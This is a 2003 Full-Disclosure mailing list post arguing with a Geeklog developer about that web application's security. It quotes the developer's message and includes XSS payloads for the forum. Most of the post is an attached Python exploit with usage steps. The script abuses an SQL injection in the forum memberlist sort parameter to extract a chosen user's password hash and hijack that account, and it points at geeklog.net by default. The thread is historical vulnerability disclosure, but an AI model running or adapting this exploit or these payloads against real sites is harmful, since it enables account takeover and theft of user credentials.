<<< Date Index >>>     <<< Thread Index >>>

Re: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities



Dirk,

Ok let me get this straight, basicly what your saying is,
He's correct on one point the xss issue, and the others might possibly
affect mysql 4.1" (it does)
and then you go about and tell him how he wasted everybodys time
So if it affects only 1% of your userbase its not an issue and you shouldn't
be reporting it ?
even on mysql 3 its probably posible to constuct some url that will suck up
a lot of resources

on your site you claim Three members of the Geeklog development team have
now been trying to reproduce
these issues and failed, wouldn't your time have been better spend *fixing*
these issues,
it's hardly rocket science. why wait until someone comes up with a clever
way to exploit it. It's obviously
a risk why wait until it becomes a threat

IMHO you've got the wrong attitude. Anyway I am not done yet
I don't normally "do" sql injection but beeing anoyed with your response as
I was i took a quick
look at this geeklog, and I was stunned at how insecure it was

- It by default stores the password hash in a cookie, you cant turn that off
- you dont have to enter your old password in order to change it

this means that any xss issue in this site will lead to compromises of
accounts, you can steal the
hash and userID place it in your cookie, log in and voila, if you do this
you have to be *EXTREMELY*
wary of xss issues, well your not, you can find these all over the place

all the classics just work like

<img src="javascript:alert()">

<b style="background-image: url(javascript:alert(document))">test</b>

in the forum, I wont even bother listing all the issues

parameters passed in urls that get inserted into queries get sanitized
hardly anywhere ,
I attached a python script that should crack any users account  who ever
posted to the forum's in under half an hour,
just get the hash stuff it and the acomanying user id in a cookie, get to
the site and change the password
The exploit is rather messy and I haven't tested it too thorougly but it
should work (i think :) )  note this is a seperate issue as the ones
reported by Lorenzo. but again these issues all over the place


--jelmer




----- Original Message ----- 
From: "Dirk Haun" <dirk@xxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Sunday, October 05, 2003 11:03 PM
Subject: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities


> Lorenzo Hernandez Garcia-Hierro wrote:
>
> >Due to the completely incorrect treatment and work of the Geeklog
> >development team , that they don't developed fixes for THEIR product
>
> As a member of the Geeklog Development Team, I'd like to point out that
> the poster of the above lines did not bother to contact us, both with his
> original findings, nor with these patches. Talk about incorrect treatment.
>
> Furthermore, of the original findings (posted here and on BugTraq a week
> ago), only the Shoutbox issue has been confirmed (and a patch is
> available on the Geeklog website).
>
> None of the supposed SQL injection issues that Lorenzo Hernandez Garcia-
> Hierro claims to have found could be confirmed by us or members of the
> Geeklog community. We can only assume that he only noticed that when
> attempting to inject SQL into URLs, Geeklog would produce SQL errors and
> from that he seems to have deduced that Geeklog was vulnerable for SQL
> injections. When asked to explain his findings, he couldn't (or wouldn't)
> come up with a working example either.
>
> Now, there's no doubt that Geeklog could do a better job in filtering
> these attempts. Work on that is currently under way - which we would have
> told Lorenzo Hernandez Garcia-Hierro if he had bothered to contact us.
>
> Potential problems that we have found so far:
>
> - the SQL error message displayed by Geeklog could, in theory, leak
> sensitive information
> - sites where the PHP magic_quotes setting is OFF are slightly more prone
> to the (alleged) injections then when it's ON
> - sites running on MySQL 4.1 (which is currently in alpha state and not
> ready for production use) are at a higher risk since MySQL 4.1 allows
> concatenation of SQL requests (which previous versions didn't)
>
> We have informed our users about these issues on the Geeklog homepage and
> will continue to do so. We value security very highly, but we prefer to
> handle it in a non-sensationalist way. We would have prefered to come up
> with a solution to the problems and then post a detailed analysis of the
> problems here (and on BugTraq). With his failure to contact the
> developers, Lorenzo Hernandez Garcia-Hierro has yet again caused more
> confusion than actually helping the situation.
>
> Overall, this is a textbook example of how NOT to handle security issues.
> By not contacting the developers, posting a report full of inaccuracies,
> and, in the end, mostly non-working examples, Lorenzo Hernandez Garcia-
> Hierro has caused uncertainty and confusion amongst the Geeklog users and
> basically wasted everyone's time, including that of the developers.
>
> Dirk Haun,
> Maintainer of the Geeklog 1.3.x branch,
> Geeklog Development Team
>
>
> -- 
> http://www.geeklog.net/
> http://geeklog.info/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
#!/usr/bin/python

"""

Messy geeklog exploit by jelmer


usage :
    

0. If you haven't got python installed download it at http://www.python.org/

1. register an account at the geeklog server you want to crack

2. change 

   OUR_USER_ID
   OUR_USERNAME
   OUR_PASSWORD
   OUR_EMAIL
   
   in the source code below to the values asigned to the account you generated
   
   change GEEKLOG_LOCATION to the location of the geeklog you want to crack for 
instance
   http://www.geeklog.net
   
   
3. Lookup the userID of the user you want to crack and fill it in as the 
TARGET_USER_ID below

4. run this script from the commandline by typing python geeklog.py, 
   *nix users can also chmod +x ./geeklog.py
   Now wait (quite a long time) as it needs to crack 32 positions
   


notes :


theoreticly it can produce false results when a user registers while cracking 
is in progress

"""


import md5, urllib, urllib2, re


OUR_USER_ID = 7000
OUR_USERNAME = "yourusername"
OUR_PASSWORD = "yourpassword"
OUR_EMAIL = "your@xxxxxxxxx"

TARGET_USER_ID = 7001

GEEKLOG_LOCATION = "http://www.geeklog.net";


HASHCHARS = "0123456789abcdef"
GEN_PASSWORD_CHARS = "abcdefghijklmnopqrstuvwxyz"


def getSessionID(username, password):
    
    myreq = urllib2.Request(GEEKLOG_LOCATION + "/users.php")
    
    data = {"loginname" : username,
            "passwd"    : password
           }
            
    myreq.add_data(urllib.urlencode(data))
    page = urllib2.urlopen(myreq)
    cookies = page.info()["Set-Cookie"]
    match = re.search(r"gl_session=([0-9]{1,15})", cookies)
    return match.group(1)    


def changePassword(sessionID, newPassword):
    
    data = {"passwd"      : newPassword,
            "cooktime"    : "604800",
            "email"       : OUR_EMAIL,
            "uid"         : str(OUR_USER_ID),
            "mode"        : "saveuser",
            "username"    : OUR_USERNAME
           }

    cookie = "gl_session=" + sessionID 
    
    myreq = urllib2.Request(GEEKLOG_LOCATION + "/usersettings.php")
    myreq.add_data(urllib.urlencode(data))
    myreq.add_header("Cookie",cookie)
    urllib2.urlopen(myreq)    
    
    print "changed password to " + newPassword


def hexstr(inchars):
    result = ''
    for char in inchars:
        result += ('0' + hex(ord(char))[2:])[-2:]
    return result


def find(input, level, max, character, position):
    
    found = False
    result = ""
    
    for char in GEN_PASSWORD_CHARS:
    
        if not found:
            start = input + char
            
            if level < max:
                found, result = find(start, level + 1 , max, character, 
position)
            else:
                if hexstr(md5.new(start).digest())[position] == character:
                    return True, start
    
    return found, result


def generatePasswordWithHashCharAtPosition(character, position):
    
    nrOfChars = 0
    while True:
        (found, value) = find ("", 0, nrOfChars, character, position)
        
        if found:
            return value
        else:
            nrOfChars +=1



sessionID = getSessionID(OUR_USERNAME, OUR_PASSWORD)

print "got session ID : "  + sessionID

result = ""
for i in range(32):
    
    print "cracked %s of 32 hash characters : %s" % ( i, result)
    
    page = 1
    found = False
    for j in range(len(HASHCHARS)):
        
        changePassword(sessionID, 
generatePasswordWithHashCharAtPosition(HASHCHARS[j], i))

        while True:
        
            webpage = urllib2.urlopen(GEEKLOG_LOCATION + 
"/forum/memberlist.php?order=mid(passwd," + str(i + 1) + 
",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()
            
            us = webpage.find("users.php?mode=profile&uid=" + str(OUR_USER_ID) 
+ '"')
            target = webpage.find("users.php?mode=profile&uid=" + 
str(TARGET_USER_ID) + '"')


            if us != -1 and target != -1:
                found = us > target
                break
                
            elif us != -1:
                break
                
            elif target != -1:
                found = True
                break
                
            else:
                page += 1
                print "probeer pagina " + str(page)
                
        if found:
            result += HASHCHARS[j]
            break
    

print "hash complete : " + result